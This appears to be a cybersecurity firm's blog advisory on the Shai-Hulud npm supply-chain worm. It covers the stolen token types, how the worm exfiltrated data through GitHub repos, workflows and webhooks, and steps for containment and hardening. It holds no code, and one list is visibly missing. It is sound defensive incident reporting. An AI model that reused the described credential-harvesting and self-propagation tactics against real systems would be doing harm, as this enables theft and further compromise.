partial view of woman typing on laptop at tabletop with smartphone and notebook, cyber security
Insight Type: Blog
Maidar Secure Advisory: CrowdStrike incident

Executive Summary

On 16/09/2025, multiple security researchers and publications reported a software-supply-chain ((tracked as Shai-Hulud) incident that injected a self-propagating credential-stealing worm (Bundle.js) code into dozens to hundreds of npm packages, including some packages published under a CrowdStrike npm account. The malicious packages reportedly exfiltrate credentials and propagate by publishing further compromised packages. The campaign briefly used the crowdstrike-publisher npm account to publish trojanised packages; CrowdStrike removed those versions and rotated public registry keys

What Happened and Confirmed impacted Elements/IOCs

  • A malicious package believed first trojanised on 14 Sept 2025, 17:58 UTC was used as initial vector; it used a payload that runs TruffleHog to search for secrets on a host and cloud metadata endpoints, then exfiltrated or abused found tokens. The malware is capable of Linux/macOS execution and targets developer/CI contexts.
  • The malware is described as self-replicating and credential-stealing: every install can harvest credentials and publish further infected packages:

Just to name a few.

  • Common secrets which were stolen: GITHUB_TOKEN, NPM_TOKEN, AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY, other CI secrets and PATs
  • Exfiltration / staging indicators: creation of public GitHub repository names with “Shai-Hulud” in the repo name (used to publish stolen secrets), and creation of unauthorized .github/workflows/* GitHub Actions YAMLs that perform exfiltration steps
  • Known attacker behavior: validation of tokens via GitHub “whoami” endpoints, contacting GitHub APIs, contacting remote webhook endpoints (reports reference webhook[.]site / attacker controlled webhooks used as exfil sinks).

Likely Adversary behaviour:

  • Initial Access: compromise of npm publisher account(s) or compromise of maintainer environment with npm credentials.
  • Payload: self-propagating JavaScript that exfiltrates credentials found on host, searches for local npm credentials or tokens, and uses discovered credentials to publish additional infected packages.
  • Propagation: uses npm publishing APIs / GitHub APIs to create new packages or update package tarballs.
  • Data exfiltration: secrets, tokens, possibly environment variables or credential files on developer machines and CI runners.

Containment & Eradication (recommended)

  • If you use any affected packages: immediately remove or pin to known-good versions (downgrade or use local clean cache/artifacts).
  • Rebuild: Wipe and rebuild compromised developer workstations and CI runners from known-good images. Do not rely on in-place remediation for suspect hosts.
  • Registry account hygiene: For any internal or third-party publisher accounts used by your organization, enforce MFA, rotate publish tokens, and review account access logs.
  • Rotate all potentially exposed credentials NOW: rotate/revoke any secrets that may have been present on developer machines or CI runners during the affected window: NPM tokens, GitHub PATs and Actions secrets, cloud provider keys (AWS, Azure, GCP). Treat tokens as compromised until proven otherwise.

Recovery & hardening

  • Harden developer machines & CI: restrict access to secrets in local environments, avoid storing PATs in plain environment variables on developer devices, move build secrets to secret managers accessible only at build time.
  • Implement signed packages (where possible) and verify package integrity via lockfiles and checksums.
  • Add SBOM generation to CI and automatic scanning for newly published packages.

CrowdStrike Response

  • Confirmed detection of several malicious npm packages in the public registry, removed those packages and rotated keys in public registries; stated the Falcon sensor/platform is not impacted and customers remain protected. Ongoing investigation with npm. Multiple security vendors (ReversingLabs, OX Security, StepSecurity, Aikido, Wiz) have analyzed the campaign and warned of its wormlike, self-propagation characteristics and the attacker goal of token/cloud-credential theft and automation of downstream compromise.

Sources

Share Articles

Insights

News Centre

Media Type
Maidar Secure Expands into Australia: Elevating Cyber Resilience
Brisbane, Australia – 5 March 2025 – Maidar Secure, a leading Security Operations Center (SOC) provider, is proud to announce its expansion into the Australian market. With this st...
Maidar Secure Advisory:Black Basta Ransomware Operators Exploit M...
Overview The notorious ransomware group, Black Basta, has intensified its use of social engineering techniques to infiltrate organizations, leveraging Microsoft Teams and malicious...
Maidar Secure Achieves Prestigious ISO 27001:2022 Certification
Maidar Secure Achieves Prestigious ISO 27001:2022 Certification Maidar Secure is proud to announce its achievement of the internationally recognized ISO 27001:2022 certification, u...
Basic SOC-as-a-Service: Simplified Security for Growing Businesse...
As businesses grow, so do their cybersecurity challenges. From increased exposure to evolving threats, navigating today’s digital landscape requires robust protection. Yet, for man...
Why a Security Operations Center (SOC) is Essential for Businesse...
Organizations face constant threats to their digital assets, from malware and phishing to unauthorized access and advanced cyberattacks. Protecting sensitive data, ensuring operati...
Security Automation, Orchestration & Response
As a leading provider of SOC-as-a-Service (SOCaaS), Maidar Secure helps customers automate their repetitive security operations tasks through various means. Here are some examples:...
Hope is not a security strategy. Get proactive about your defence today with Maidar Secure.